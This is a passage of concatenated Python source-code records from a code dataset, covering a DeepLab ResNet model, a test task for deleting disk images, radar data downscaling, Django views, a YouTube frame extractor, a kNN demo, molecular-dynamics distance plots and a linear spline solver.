downsample=None,BatchNorm=nn.BatchNorm2d):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride, bias=False) # change\n self.bn1 = BatchNorm(planes, affine = affine_par)\n\n padding = dilation\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=padding, bias=False, dilation = dilation)\n self.bn2 = BatchNorm(planes, affine = affine_par)\n\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = BatchNorm(planes * 4, affine = affine_par)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\nclass Classifier_Module_V2(nn.Module):\n def __init__(self, dilation_series, padding_series, num_classes, inplane):\n super(Classifier_Module_V2, self).__init__()\n self.conv2d_list = nn.ModuleList()\n for dilation, padding in zip(dilation_series, padding_series):\n self.conv2d_list.append(nn.Conv2d(inplane, num_classes, kernel_size=3, stride=1, padding=padding, dilation=dilation, bias = True))\n for m in self.conv2d_list:\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv2d_list[0](x)\n for i in range(len(self.conv2d_list)-1):\n out += self.conv2d_list[i+1](x)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes,BatchNorm=nn.BatchNorm2d):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = BatchNorm(64, affine = affine_par)\n\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, ceil_mode=True) # change\n self.layer1 = self._make_layer(block, 64, layers[0],BatchNorm=BatchNorm)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,BatchNorm=BatchNorm)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2,BatchNorm=BatchNorm)\n #self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4,BatchNorm=BatchNorm)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4,BatchNorm=BatchNorm,dilations=[4,8,16])\n if block.__name__ == 'Bottleneck':\n self.layer5 = self._make_pred_layer(ASPP, 2048, [6,12,18,24], BatchNorm, num_classes)\n else:\n self.layer5 = self._make_pred_layer(ASPP, 512, [6,12,18,24], BatchNorm, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_layer(self, block, planes, blocks, stride=1, dilation=1,BatchNorm=nn.BatchNorm2d,dilations=None):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion or dilation == 2 or dilation == 4:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),\n BatchNorm(planes * block.expansion,affine = affine_par))\n layers = []\n if dilations == None:\n layers.append(block(self.inplanes, planes, stride,dilation=dilation, downsample=downsample,BatchNorm=BatchNorm))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, dilation=dilation, BatchNorm=BatchNorm))\n else:\n layers.append(block(self.inplanes, planes, stride,dilation=dilations[0], downsample=downsample,BatchNorm=BatchNorm))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, dilation=dilations[i], BatchNorm=BatchNorm))\n return nn.Sequential(*layers)\n\n def _make_pred_layer(self, block, inplane, dilation_series, BatchNorm, num_classes):\n return block(inplane, dilation_series, BatchNorm, num_classes)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n x1 = self.layer1(x)\n x2 = self.layer2(x1)\n x3 = self.layer3(x2)\n x4 = self.layer4(x3)\n out = self.layer5(x4)\n return out\n\n\ndef Res_Deeplab(num_classes=21, layers=18):\n layers = int(layers)\n if layers == 18:\n model = ResNet(BasicBlock, [2, 2, 2, 2], num_classes,SynchronizedBatchNorm2d)\n elif layers == 34:\n model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes,SynchronizedBatchNorm2d)\n elif layers == 50:\n model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes,SynchronizedBatchNorm2d)\n elif layers == 101:\n model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes,SynchronizedBatchNorm2d)\n elif layers == 152:\n model = ResNet(Bottleneck, [3, 8, 36, 3], num_classes,SynchronizedBatchNorm2d)\n else:\n print('unsupport layer number: []'.format(layers))\n exit()\n return model\n","sub_path":"model_nonRW.py","file_name":"model_nonRW.py","file_ext":"py","file_size_in_byte":10564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2842838","text":"#!/usr/bin/python\nfrom transaction.base_task import *\nfrom service.message_define import *\nfrom test_result_enum import *\n\nclass DeleteDiskImageTask(BaseTask):\n operate_timeout = 5\n def __init__(self, task_type, messsage_handler,\n case_manager,logger_name):\n self.case_manager = case_manager\n #logger_name = \"task.delete_disk_image\"\n BaseTask.__init__(self, task_type, RequestDefine.delete_disk_image,\n messsage_handler, logger_name)\n \n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.delete_disk_image, result_success,\n self.onDeleteSuccess)\n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.delete_disk_image, result_fail,\n self.onDeleteFail)\n self.addTransferRule(state_initial, AppMessage.EVENT,\n EventDefine.timeout, result_any,\n self.onDeleteTimeout) \n\n def invokeSession(self, session):\n \"\"\"\n task start, must override\n \"\"\" \n request = getRequest(RequestDefine.delete_disk_image)\n param = self.case_manager.getParam()\n session.target = param[\"disk\"]\n control_server = param[\"control_server\"]\n request.setString(ParamKeyDefine.uuid, session.target)\n self.info(\"[%08X]request delete disk image '%s' to control server '%s'\"%\n (session.session_id, session.target, control_server))\n \n request.session = session.session_id\n self.setTimer(session, self.operate_timeout)\n self.sendMessage(request, control_server)\n \n def onDeleteSuccess(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]delete disk image success\"%\n (session.session_id))\n \n self.case_manager.finishTestCase(TestResultEnum.success) \n session.finish()\n\n def onDeleteFail(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]delete disk image fail\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.fail)\n session.finish()\n \n def onDeleteTimeout(self, msg, session):\n self.info(\"[%08X]delete disk image timeout\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.timeout)\n session.finish()\n","sub_path":"zctool_v1.25_共享存储/task/delete_disk_image.py","file_name":"delete_disk_image.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74174692","text":"import argparse\nimport os\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport cv2\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef unpack_and_downscale_hdf_wrapper(run_id_and_hdf_archive_path):\n # unpack arguments\n if len(run_id_and_hdf_archive_path) != 2 and len(run_id_and_hdf_archive_path) != 3:\n raise ValueError(\"Invalid arguments passed to wrapper function\")\n\n return unpack_and_downscale_hdf(*run_id_and_hdf_archive_path)\n\n\ndef unpack_and_downscale_hdf(run_id, hdf_archive_path, outsize=(64, 64)):\n with h5py.File(hdf_archive_path, \"r\", libver=\"latest\") as hdf_archive:\n run = hdf_archive[str(run_id)]\n run = np.array(run)\n\n # first axis is number of sequences, i.e. num of channels\n # move it to the last position because we are interested in resizing\n # the radar scan\n run = np.moveaxis(run, 0, -1)\n\n run = run.astype(np.float32)\n run = cv2.resize(\n run, dsize=outsize, interpolation=cv2.INTER_LINEAR\n )\n run = run.astype(np.float16)\n # put the axis where where it was\n run = np.moveaxis(run, -1, 0)\n\n return run, run.shape[-1]\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Convert the radar dataset from TAR/ZIP format to HDF5.\"\n )\n\n parser.add_argument(\"radar_directory\", type=str)\n args = parser.parse_args()\n\n metadata = pd.read_csv(\n os.path.join(args.radar_directory, \"hdf_metadata.csv\"), index_col=\"id\"\n )\n sort_meta = metadata.sort_values(by=\"start_datetime\", ascending=True)\n\n hdf_archive_path = os.path.join(\n args.radar_directory, \"hdf_archives\", \"all_data.hdf5\"\n )\n\n runs = []\n count = 0\n\n with ProcessPoolExecutor() as executor:\n worker_args = []\n for run_id in sort_meta.index:\n # generate argument list\n worker_args.append((run_id, hdf_archive_path))\n\n # call with executor\n with tqdm(total=len(worker_args)) as pbar:\n for run, c in executor.map(unpack_and_downscale_hdf_wrapper, worker_args):\n runs.append(run)\n count += c\n pbar.update(1)\n\n runs = np.concatenate(runs)\n\n print(f\"Processed {count} radar scans\")\n print(\"runs.shape:\", runs.shape)\n\n outfile_path = os.path.join(args.radar_directory, \"runs_64x64.npz\")\n with open(outfile_path, \"wb\") as outfile:\n np.savez_compressed(outfile, runs)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data_processing/04_generate_single_npz_resize.py","file_name":"04_generate_single_npz_resize.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588563555","text":"from django.views.generic import ListView, DetailView\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom .filters import PostFilter, F, C, X # импортируем недавно написанный фильтр\nfrom .models import Post, Comment\nfrom .forms import PostForm\n\n\nclass PostList(ListView):\n model = Post\n template_name = 'posts.html'\n context_object_name = 'posts'\n queryset = Post.objects.order_by('-dateCreation')\n paginate_by = 5 # поставим постраничный вывод в один элемент\n form_class = PostForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['news'] = Post.objects.all(),\n context['form'] = PostForm()\n return context\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n form.save()\n\n return super().get(request, *args, *kwargs)\n\nclass PostSearch(ListView):\n model = Post\n template_name = 'search.html'\n context_object_name = 'posts'\n # queryset = Post.objects.order_by('-dateCreation')\n ordering = ['-dateCreation']\n paginate_by = 1\n\n def get_filter(self):\n return PostFilter(self.request.GET, queryset=super().get_queryset())\n\n def get_queryset(self):\n return self.get_filter().qs\n\n def get_context_data(self, *args, **kwargs):\n return {\n **super().get_context_data(*args, **kwargs),\n 'filter': self.get_filter(),\n }\n\ndef user_list(request):\n f = F(request.GET, queryset=User.objects.all())\n return render(request, 'user_t.html', {'filter': f})\n\ndef post_list(request):\n c = C(request.GET, queryset=Post.objects.all())\n return render(request, 'post_t.html', {'filter': c})\n\ndef comment_list(request):\n x = X(request.GET, queryset=Post.objects.all())\n return render(request, 'comment_t.html', {'filter': x})\n\nclass PostDetail(DetailView):\n model = Post\n template_name = 'post_list.html'\n context_object_name = 'post'\n\n","sub_path":"news_portal/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102785080","text":"# -*- coding: utf-8 -*-\n\"\"\"\n you2frame.you2frame\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n A short description.\n\n :authors: 2019 by César Gouveia, see AUTHORS\n :license: CC0 1.0, see LICENSE file for details\n\"\"\"\n\nfrom pytube import YouTube\nimport os\nfrom PIL import Image\nimport imageio\nimport argparse\n\ndef download_you(video_url, save_path):\n \"\"\"\n Function that gets a youtube video url and saves it in\n a local path as mp4 format. \n \"\"\"\n\n print(\"Downloading youtube video...\")\n status = YouTube(video_url).streams.first().download(save_path)\n print(\"Finished downloading {}\".format(status))\n\ndef extract_frames(video_path, frames_path, filename, nframes):\n \"\"\"\n Function that gets a local video and converts it into a\n set of frames\n \"\"\"\n\n for file in os.listdir(video_path):\n\n if file.endswith(\".mp4\"):\n \n videoname = os.path.join(video_path, file)\n vid = imageio.get_reader(videoname, 'ffmpeg')\n fps = int(math.floor(vid.get_meta_data()['fps']))\n dur = int(math.floor(vid.get_meta_data()['duration']))\n\n for i in range(dur):\n frame = vid.get_data(i * fps)\n img = Image.fromarray(frame, 'RGB')\n img.save('%s-%d.jpg' % (filename, i))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--video_url',\n default=\"https://www.youtube.com/watch?v=ArSTeAiFWt4\",\n help='Video url that you want to convert'\n )\n parser.add_argument(\n '--video_path',\n default=\"../data/videos/\",\n help='Directory where you want to save the video'\n )\n parser.add_argument(\n '--frames_path',\n default=\"../data/frames/\",\n help='Directory where you want to save the frames'\n )\n parser.add_argument(\n '--filename',\n default=\"lisboa\",\n help='Name of the frames'\n )\n parser.add_argument(\n '--nframes',\n type=int,\n default=100,\n help='Number of frames per video'\n )\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n download_you(args.video_url, args.video_path)\n extract_frames(args.video_path, args.frames_path, args.filename, args.nframes)\n","sub_path":"you2frame/you2frame.py","file_name":"you2frame.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348366255","text":"import psycopg2\nimport sys\nimport os\nimport csv\nimport re\nfrom xml.dom.minidom import Text, Element\n\nimport common.globals as g\nimport common.functions as fn\n\n\nclass quota_order_number_origin(object):\n def __init__(self, quota_order_number_id, geographical_area_id, validity_start_date):\n self.quota_order_number_id = fn.mstr(quota_order_number_id)\n self.geographical_area_id = fn.mstr(geographical_area_id)\n self.validity_start_date = fn.mdate(validity_start_date)\n self.validity_end_date = \"\"\n self.update_type = \"3\"\n\n self.cnt = 0\n self.xml = \"\"\n\n self.get_geographical_area_sid()\n self.get_quota_order_number_sid()\n g.app.last_quota_order_number_origin_sid += 1\n self.quota_order_number_origin_sid = g.app.last_quota_order_number_origin_sid\n\n def get_geographical_area_sid(self):\n sql = \"\"\"select geographical_area_sid from geographical_areas\n where geographical_area_id = %s order by validity_start_date desc limit 1\"\"\"\n params = []\n params.append(self.geographical_area_id)\n cur = g.app.conn.cursor()\n cur.execute(sql, params)\n rows = cur.fetchall()\n if len(rows) > 0:\n self.geographical_area_sid = rows[0][0]\n else:\n self.geographical_area_sid = -1\n\n def get_quota_order_number_sid(self):\n sql = \"\"\"select quota_order_number_sid from quota_order_numbers\n where quota_order_number_id = %s order by validity_start_date desc limit 1\"\"\"\n params = []\n params.append(self.quota_order_number_id)\n cur = g.app.conn.cursor()\n cur.execute(sql, params)\n rows = cur.fetchall()\n if len(rows) > 0:\n self.quota_order_number_sid = rows[0][0]\n else:\n self.quota_order_number_sid = -1\n\n def writeXML(self, app):\n out = app.quota_order_number_origin_XML\n\n out = out.replace(\"[QUOTA_ORDER_NUMBER_ORIGIN_SID]\", str(self.quota_order_number_origin_sid))\n out = out.replace(\"[QUOTA_ORDER_NUMBER_SID]\", str(self.quota_order_number_sid))\n out = out.replace(\"[VALIDITY_START_DATE]\", self.validity_start_date)\n out = out.replace(\"[VALIDITY_END_DATE]\", self.validity_end_date)\n out = out.replace(\"[GEOGRAPHICAL_AREA_SID]\", str(self.geographical_area_sid))\n out = out.replace(\"[GEOGRAPHICAL_AREA_ID]\", self.geographical_area_id)\n\n out = out.replace(\"[UPDATE_TYPE]\", self.update_type)\n out = out.replace(\"[TRANSACTION_ID]\", str(app.transaction_id))\n out = out.replace(\"[MESSAGE_ID1]\", str(app.message_id))\n out = out.replace(\"[RECORD_SEQUENCE_NUMBER1]\", str(app.message_id))\n\n out = out.replace(\"\\t\\t\\t\\t\\n\", \"\")\n self.xml = out\n\n app.transaction_id += 1\n app.message_id += 1\n","sub_path":"create-data/create_reference_data/common/quota_order_number_origin.py","file_name":"quota_order_number_origin.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179923712","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom geopy.distance import vincenty\nimport random\n\n#plz_nrw = pd.read_csv('https://raw.githubusercontent.com/mexemt/location_optimization/master/Datasets/plz_nrw.csv', encoding='unicode_escape')\nplz_nrw = pd.read_csv('C:/Users/maxim/Documents/GitHub/location_optimization/Datasets/plz_nrw.csv', encoding='unicode_escape')\nplz_nrw = pd.DataFrame(plz_nrw)\ndistances = pd.read_csv('C:/Users/maxim/Documents/GitHub/location_optimization/Datasets/distances.csv', encoding='unicode_escape', index_col=0)\ndistances = pd.DataFrame(distances)\n\nclass locations:\n def __init__(self, name, plz_nrw, rng):\n self.name = name\n self.locations = plz_nrw\n self.rng = rng\n self.locations['open'] = 0\n self.locations['fixed_costs'] = 0\n self.locations['fixed_costs'] = [random.choice(self.rng) for x in self.locations['fixed_costs']]\n\nrng_cost_fx_low = range(10000, 20000)\nloc = locations('low', plz_nrw, rng_cost_fx_low)\nlocations = loc.locations\n\nprint(locations)","sub_path":"Code/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"165304495","text":"# Pure numpy k-nearest neighbors demo with OpenCV visualization\n# Written by Matt Zucker, April 2017\n\nimport numpy as np\nimport cv2\n\n######################################################################\n# Define some constants\n\nSIZE = 512\nNUM_POINTS = 1000\n\n######################################################################\n# OpenCV has fast matching code, but the Python interface to it\n# changes significantly from version to version. This is a reasonably\n# fast pure numpy k-nearest-neighbor function that you might find\n# helpful for your own code.\n\ndef bruteforce_knn(points, p, k):\n\n assert(len(p) == points.shape[1])\n\n diff = points - p\n d = (diff**2).sum(axis=1)\n idx = np.argpartition(d, k)\n\n idx = idx[:k]\n d = d[idx]\n\n idx2 = np.argsort(d)\n return idx[idx2], np.sqrt(d[idx2])\n\n######################################################################\n# Show a nice demo illustrating knn search\n\ndef main():\n\n # Sample a bunch more points than we actually need because we will do\n # rejection sampling below.\n points = np.random.random((NUM_POINTS*4, 2))*SIZE\n\n # Reject points not inside the \"donut\" we want to display\n diff = points - (SIZE/2, SIZE/2)\n d = np.sqrt((diff**2).sum(axis=1))\n donut_mask = (d < SIZE/2 - 8) & (d > SIZE/8)\n points = points[donut_mask]\n\n # Trim down to the desired number of points\n points = points[:NUM_POINTS].astype(np.float32)\n\n # Create a background image with each point\n background = 255*np.ones((SIZE, SIZE, 3), dtype='uint8')\n\n for p in points:\n cv2.circle(background, tuple(p.astype(int)), 3, (0, 0, 0), -1, 16)\n\n # Pop up a window\n #cv2.namedWindow('knn')\n cv2.imshow('knn', background)\n\n ##################################################\n # Define a mouse handling function:\n\n def mouse(event, x, y, flags, param):\n\n # Create a point to match\n p = np.array([x,y], dtype=np.float32)\n\n # Do our brute-force knn search\n matches, dists = bruteforce_knn(points, p, 3)\n\n # Display the point and the neighbors\n display = background.copy()\n\n cv2.circle(display, (x, y), 3, (255, 0, 255), 1, 16)\n\n colors = [ (0, 0, 255),\n (0, 255, 0),\n (255, 0, 0) ]\n\n for color, i in zip(colors, matches):\n\n pi = tuple(points[i].astype(int))\n\n cv2.line(display, (x, y), pi, color, 1, 16)\n cv2.circle(display, pi, 4, color, -1, 16)\n\n cv2.imshow('knn', display)\n\n ##################################################\n # Install our mouse callback and run the demo\n\n cv2.setMouseCallback('knn', mouse, None)\n\n while True:\n k = np.uint8(cv2.waitKey(5)).view(np.int8)\n if k == 27:\n break\n\nif __name__ == '__main__':\n main()\n","sub_path":"knn_demo.py","file_name":"knn_demo.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350301447","text":"import numpy as np\nimport MDAnalysis\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc, rcParams\nimport argparse\n\n#rcParams['axes.labelsize'] = 8\n#rcParams['xtick.labelsize'] = 8\n#rcParams['ytick.labelsize'] = 8\n#rcParams['legend.fontsize'] = 10\n#rcParams['font.family'] = ['sans-serif']\n#rcParams['font.sans-serif'] = ['Arial']\nrcParams['text.usetex'] = False\nrcParams['svg.fonttype'] = 'none'\n#matplotlib.rcParams['axes.unicode_minus'] = False\n#rcParams['figure.subplot.wspace']= 0.3\n#rcParams['figure.subplot.bottom']= 0.1\n#rcParams['figure.subplot.hspace']= 0.2\n#rcParams['figure.subplot.left']= 0.125\n#rcParams['figure.subplot.right']= 0.9\n#rcParams['figure.subplot.top']= 0.9\n#matplotlib.rcParams['axes.linewidth']= .5\n\n##########\n# ARGUMENT HANDLING\n##########\n\nparser = argparse.ArgumentParser('Calculates FEZ distances')\n\nparser.add_argument(\n\t\"-f\",\n\ttype = str,\n\tdefault = './mdord.pdb',\n\thelp=\"Structure (pdb)\"\n)\n\nparser.add_argument(\n\t\"-t\",\n\ttype = str,\t\n\tdefault = 'md-c.xtc',\n\thelp=\"Trajectory (xtc)\"\n)\n\nparser.add_argument(\n\t\"-o\",\n\ttype = str,\n\tdefault = None,\n\thelp=\"output name\"\n)\n\nargs = parser.parse_args()\n\n##########\n# DEFINITIONS\n##########\n\ndef dis (sel1, sel2, x) :\n\tres_i = x.select_atoms(sel1 + ' and name CA').coordinates()\n\tres_j = x.select_atoms(sel2 + ' and name CA').coordinates()\n\tdis = np.linalg.norm(res_i - res_j)\n\treturn dis\n\n##########\n# CALCULATIONS\n##########\n\nu = MDAnalysis.Universe(args.f, args.t)\nprotein = u.select_atoms('protein')\n\nup = MDAnalysis.Universe('./UP_correctpro.pdb')\nup_pro = up.select_atoms('protein')\n\ndn = MDAnalysis.Universe('./DN_correctH.pdb')\ndn_pro = dn.select_atoms('protein')\n\nFen_A = []\nFen_B = []\nZip_A = []\nZip_B = []\nExp_A = []\nExp_B = []\n\nfor ts in u.trajectory:\n\tFen_A.append(dis('resid 324 and segid A', 'resid 198 and segid B', protein))\n\tFen_B.append(dis('resid 324 and segid B', 'resid 198 and segid A', protein))\n\tZip_A.append(dis('resid 326 and segid A', 'resid 237 and segid A', protein))\n\tZip_B.append(dis('resid 326 and segid B', 'resid 237 and segid B', protein))\n\tExp_A.append(dis('resid 322 and segid A', 'resid 212 and segid A', protein))\n\tExp_B.append(dis('resid 322 and segid B', 'resid 212 and segid B', protein))\t\n\nFAup = []\nFBup = []\nZAup = []\nZBup = []\nEAup = []\nEBup = []\n\nFAup.append(dis('resid 324 and segid A', 'resid 198 and segid B', up_pro))\nFBup.append(dis('resid 324 and segid B', 'resid 198 and segid A', up_pro))\nZAup.append(dis('resid 326 and segid A', 'resid 237 and segid A', up_pro))\nZBup.append(dis('resid 326 and segid B', 'resid 237 and segid B', up_pro))\nEAup.append(dis('resid 322 and segid A', 'resid 212 and segid A', up_pro))\nEBup.append(dis('resid 322 and segid B', 'resid 212 and segid B', up_pro))\n\nFAdn = []\nFBdn = []\nZAdn = []\nZBdn = []\nEAdn = []\nEBdn = []\n\nFAdn.append(dis('resid 324 and segid A', 'resid 198 and segid B', dn_pro))\nFBdn.append(dis('resid 324 and segid B', 'resid 198 and segid A', dn_pro))\nZAdn.append(dis('resid 326 and segid A', 'resid 237 and segid A', dn_pro))\nZBdn.append(dis('resid 326 and segid B', 'resid 237 and segid B', dn_pro))\nEAdn.append(dis('resid 322 and segid A', 'resid 212 and segid A', dn_pro))\nEBdn.append(dis('resid 322 and segid B', 'resid 212 and segid B', dn_pro))\n\n##########\n# PLOTTING\n##########\n\n#plt.figure(figsize=(20,16))\n#A = plt.subplot(211)\n#plt.plot(Fen_A, label = 'Fenestration', color = 'blue', linewidth = 3)\n#plt.plot(Zip_A, label = 'Zipper', color = 'green', linewidth = 3)\n#plt.plot(Exp_A, label = 'Expansion', color = 'red', linewidth = 3)\n#plt.setp(A.get_xticklabels(), visible=False)\n#plt.setp(A.get_yticklabels(), fontsize = 18)\n#plt.ylabel(\"z ($\\AA$)\", fontsize = '24')\n#plt.legend(fontsize = 'xx-large', loc = 'best') \n#plt.title('Chain A', fontsize = 36) \n#B = plt.subplot(212, sharex = A, sharey = A)\n#plt.plot(Fen_B, label = 'Fenestration', color = 'blue', linewidth = 3)\n#plt.plot(Zip_B, label = 'Zipper', color = 'green', linewidth = 3)\n#plt.plot(Exp_B, label = 'Expansion', color = 'red', linewidth = 3)\n#plt.setp(B.get_xticklabels(), fontsize = 18)\n#plt.setp(B.get_yticklabels(), fontsize = 18)\n#plt.xlabel(\"time (ns)\", fontsize = '24')\n#plt.ylabel(\"z ($\\AA$)\", fontsize = '24')\n#v = [0,100,3,18]\n#plt.axis(v)\n#plt.title('Chain B', fontsize = 36) \n#plt.savefig(\"{}_FEZ_AB.png\".format(args.o), format='png', dpi=300)\n#plt.savefig(\"{}_FEZ_AB.svg\".format(args.o), format='svg', dpi=300)\n\nplt.clf()\nplt.figure(figsize=(16,8))\nFZ = plt.subplot(121)\nplt.scatter(Zip_A, Fen_A, label = 'Chain A', color = 'green')\nplt.scatter(Zip_B, Fen_B, label = 'Chain B', color = 'gray')\nplt.plot(Zip_A, Fen_A, label = 'Chain A', color = 'green', alpha = 0.5)\nplt.plot(Zip_B, Fen_B, label = 'Chain B', color = 'gray', alpha = 0.5)\nplt.scatter(ZAup, FAup, label = '4BW5 (Up)', color = 'black', marker = 'D', s = 40)\nplt.scatter(ZAdn, FAdn, label = '4XDJ (Down)', color = 'blue', marker = 'D', s = 40)\nplt.xlabel('Zipper ($\\AA$)', fontsize = '18')\nplt.ylabel('Fenestration ($\\AA$)', fontsize = '18')\nplt.setp(FZ.get_xticklabels(), fontsize = 18)\nplt.setp(FZ.get_yticklabels(), fontsize = 18)\nplt.legend(fontsize = 'x-large', loc = 'best')\nFE = plt.subplot(122, sharex = FZ, sharey = FZ)\nplt.scatter(Exp_A, Fen_A, label = 'Chain A', color = 'red')\nplt.scatter(Exp_B, Fen_B, label = 'Chain B', color = 'pink')\nplt.plot(Exp_A, Fen_A, label = 'Chain A', color = 'red', alpha = 0.5)\nplt.plot(Exp_B, Fen_B, label = 'Chain B', color = 'pink', alpha = 0.5)\nplt.scatter(EAup, FAup, label = '4BW5 (Up)', color = 'black', marker = 'D', s = 40)\nplt.scatter(EAdn, FAdn, label = '4XDJ (Down)', color = 'blue', marker = 'D', s = 40)\nplt.xlabel('Expansion ($\\AA$)', fontsize = '18')\nplt.setp(FE.get_xticklabels(), fontsize = 18)\nplt.setp(FE.get_yticklabels(), visible = False)\nv = [3,18,3,16]\nplt.axis(v)\nplt.legend(fontsize = 'x-large', loc = 'best')\nplt.savefig(\"{}_FZ_FE.png\".format(args.o), format='png', dpi=300)\nplt.savefig(\"{}_FZ_FE.svg\".format(args.o), format='svg', dpi=300)\n","sub_path":"distance+xtal.py","file_name":"distance+xtal.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378400088","text":"# coding:utf-8\n\"\"\"\nCreate on 29 Aug,2019 by Wayne Yu\n\"\"\"\n\nfrom tkinter import *\n\nroot = Tk()\ntextLabel = Label(root, text=\"There is a potential safety hazard on this page.\", justify=LEFT, padx=10)\ntextLabel.pack(side=LEFT)\n# 创建一个图像Label对象,这里只支持gif格式的图片\nphoto = PhotoImage(file=\"./warning.gif\")\nimgLabel = Label(root, image=photo)\nimgLabel.pack(side=RIGHT)\n\nmainloop()","sub_path":"012Tkinter/helloTkinter_01_Label.py","file_name":"helloTkinter_01_Label.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619360849","text":"import numpy as np\nimport sympy as sp\n\ndef splain(x, y):\n\n x = np.array(x)\n y = np.array(y)\n\n dimension = 2*len(x) - 2\n\n matrix = np.zeros((dimension, dimension))\n m = (dimension-len(y))\n b = np.append(y, np.zeros(m))\n\n interpolation(x, matrix)\n continuity(x, matrix)\n\n np.set_printoptions(formatter={'float': lambda x: \"{0:0.5f}\".format(x)})\n\n print('\\033[96m')\n print('Lineal tracers coefficients')\n print('\\033[0m')\n xact = np.linalg.solve(matrix, b)\n for i in range(0,len(matrix), 2):\n expr = f'{float(\"{:.5f}\".format(xact[i]))} <-> {float(\"{:.5f}\".format(xact[i+1]))}'\n print(expr)\n\n print('\\033[96m')\n print('Lineal tracers')\n print('\\033[0m')\n x = sp.symbols('x')\n for i in range(0,len(matrix), 2):\n expr = xact[i]*x + xact[i+1]\n str = sp.latex(expr)\n print(str)\n\n\n\ndef interpolation(x, matrix):\n\n matrix[0][0] = x[0] \n matrix[0][1] = 1\n\n xn = 1\n i = 0\n for j in range(1, len(x)):\n matrix[j][i] = x[xn]\n matrix[j][i+1] = 1\n i += 2\n xn += 1\n\ndef continuity(x, matrix):\n start = len(x)\n dimension = len(matrix)\n\n\n xn = 1\n i = 0\n for j in range(start, dimension):\n matrix[j][i] = x[xn]\n matrix[j][i+1] = 1\n matrix[j][i+2] = -x[xn]\n matrix[j][i+3] = -1\n xn += 1\n i += 